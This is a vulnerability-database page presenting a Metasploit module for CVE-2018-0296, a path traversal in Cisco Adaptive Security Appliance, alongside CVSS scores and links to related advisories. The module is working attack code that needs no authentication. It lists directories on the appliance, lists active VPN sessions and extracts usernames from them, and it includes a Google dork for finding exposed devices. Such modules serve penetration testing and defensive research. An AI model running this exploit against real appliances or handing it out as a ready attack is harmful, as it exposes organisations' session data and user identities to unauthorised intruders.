Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitpackAngelo RuwanthaEXPLOITPACK:9DD91C179C6EE3C59F3BFDD2513BA94A
HistoryAug 12, 2019 - 12:00 a.m.

Cisco Adaptive Security Appliance - Path Traversal (Metasploit)

2019-08-1200:00:00
Angelo Ruwantha
69

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

JSON

Cisco Adaptive Security Appliance - Path Traversal (Metasploit)

require 'msf/core'

  class MetasploitModule < Msf::Auxiliary

    include Msf::Exploit::Remote::HttpClient

        def initialize(info={})
      super(update_info(info,
          'Name'           => "Cisco Adaptive Security Appliance  - Path Traversal",
          'Description'    => %q{
            Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296)
        A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques.
        Google Dork:inurl:+CSCOE+/logon.html
          },
          'License'        => MSF_LICENSE,
          'Author'         =>
        [
            'Yassine Aboukir',   #Initial  discovery
            'Angelo Ruwantha @h3llwings'      #msf module
        ],
          'References'     =>
        [
            ['EDB', '44956'],
            ['URL', 'https://www.exploit-db.com/exploits/44956/']
        ],
          'Arch'           => ARCH_CMD,
         'Compat'          =>
        {
            'PayloadType' => 'cmd'
        },
          'Platform'       => ['unix','linux'],
          'Targets'        =>
        [
            ['3000 Series Industrial Security Appliance (ISA)
          ASA 1000V Cloud Firewall
          ASA 5500 Series Adaptive Security Appliances
          ASA 5500-X Series Next-Generation Firewalls
          ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
          Adaptive Security Virtual Appliance (ASAv)
          Firepower 2100 Series Security Appliance
          Firepower 4100 Series Security Appliance
          Firepower 9300 ASA Security Module
          FTD Virtual (FTDv)', {}]
        ],
          'Privileged'     => false,
          'DefaultTarget'  => 0))

        register_options(
        [
          OptString.new('TARGETURI', [true, 'Ex: https://vpn.example.com', '/']),
          OptString.new('SSL', [true, 'set it as true', 'true']),
          OptString.new('RPORT', [true, '443', '443']),
        ], self.class)
    end


    def run
      uri = target_uri.path

      res = send_request_cgi({
        'method'   => 'GET',
        'uri'      => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/'),
        
      })
 

      if res && res.code == 200 && res.body.include?("{'name'")
        print_good("#{peer} is Vulnerable")
        print_status("Directory Index ")
        print_good(res.body)
             res_dir = send_request_cgi({
        'method'   => 'GET',
        'uri'      => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b'),
        
        })
        res_users = send_request_cgi({
        'method'   => 'GET',
        'uri'      => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'),
        
        })
        userIDs=res_users.body.scan(/[0-9]\w+/).flatten
        
        print_status("CSCEO Directory ") 
        print_good(res_dir.body)
    
        print_status("Active Session(s) ")
        print_status(res_users.body)
        x=0
        begin
        print_status("Getting User(s)")
        while (x<=userIDs.length)
          users = send_request_cgi({
          'method'   => 'GET',
          'uri'      => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'+userIDs[x]),
          
          })
         
          grab_username=users.body.scan(/user:\w+/)
          nonstr=grab_username
          if (!nonstr.nil? && nonstr!="")
            print_good("#{nonstr}")
          end
          x=x+1
        end
        rescue
          print_status("Complete")
        end
         
         
      else
        print_error("safe")
        return Exploit::CheckCode::Safe
      end
    end
  end

Related

checkpoint_advisories 1
hackerone 3
zdt 3
packetstorm 3
cvelist 1
cisco 1
prion 1
talosblog 2
seebug 1
exploitpack 1
nessus 2
cisa_kev 1
cve 1
nuclei 1
attackerkb 1
exploitdb 2
ics 1
fireeye 1
checkpoint_advisories
checkpoint_advisories
Cisco Adaptive Security Appliance Web Services Denial of Service (CVE-2018-0296)
2018-07-01 00:00:00
hackerone
hackerone
VK.com: CVE-2018-0296
2018-07-05 14:14:30
ok.ru: Cisco ASA Denial of Service & Path Traversal (CVE-2018-0296)
2018-07-06 23:44:08
U.S. Dept Of Defense: https://█████████ Vulnerable to CVE-2018-0296 Cisco ASA Path Traversal Authentication Bypass
2019-06-20 18:51:49
zdt
zdt
Cisco Adaptive Security Appliance - Path Traversal Exploit
2018-06-29 00:00:00
Cisco Adaptive Security Appliance - Path Traversal Exploit
2019-08-12 00:00:00
Cisco Adaptive Security Appliance Path Traversal Exploit
2018-07-24 00:00:00
packetstorm
packetstorm
Cisco Adaptive Security Appliance Path Traversal
2018-06-28 00:00:00
Cisco Adaptive Security Appliance Path Traversal
2018-07-23 00:00:00
Cisco Adaptive Security Appliance Path Traversal
2019-08-12 00:00:00
cvelist
cvelist
CVE-2018-0296
2018-06-07 12:00:00
cisco
cisco
Cisco Adaptive Security Appliance Web Services Denial of Service Vulnerability
2018-06-06 16:00:00
prion
prion
Directory traversal
2018-06-07 12:29:00
talosblog
talosblog
Cisco ASA DoS bug attacked in wild
2019-12-20 11:33:44
DNS Hijacking Abuses Trust In Core Internet Service
2019-04-18 16:08:25
seebug
seebug
Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296)
2018-06-22 00:00:00
exploitpack
exploitpack
Cisco Adaptive Security Appliance - Path Traversal
2018-06-28 00:00:00
nessus
nessus
Cisco FTD Web Services DoS (cisco-sa-20180606-asaftd)
2019-04-19 00:00:00
Cisco ASA Web Services DoS (cisco-sa-20180606-asaftd)
2018-06-25 00:00:00
cisa_kev
cisa_kev
Cisco Adaptive Security Appliance (ASA) Denial-of-Service Vulnerability
2021-11-03 00:00:00
cve
cve
CVE-2018-0296
2018-06-07 12:29:00
nuclei
nuclei
Cisco ASA - Local File Inclusion
2020-04-22 06:42:01
attackerkb
attackerkb
Cisco ASA Directory Traversal
2018-06-07 00:00:00
exploitdb
exploitdb
Cisco Adaptive Security Appliance - Path Traversal
2018-06-28 00:00:00
Cisco Adaptive Security Appliance - Path Traversal (Metasploit)
2019-08-12 00:00:00
ics
ics
Rockwell Automation Allen-Bradley Stratix 5950
2018-07-03 12:00:00
fireeye
fireeye
Think Fast: Time Between Disclosure, Patch Release and Vulnerability Exploitation — Intelligence for Vulnerability Management, Part Two
2020-04-13 00:00:00

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

JSON
Related for EXPLOITPACK:9DD91C179C6EE3C59F3BFDD2513BA94A
checkpoint_advisories1hackerone3zdt3packetstorm3cvelist1cisco1prion1talosblog2seebug1exploitpack1nessus2cisa_kev1cve1nuclei1attackerkb1exploitdb2ics1fireeye1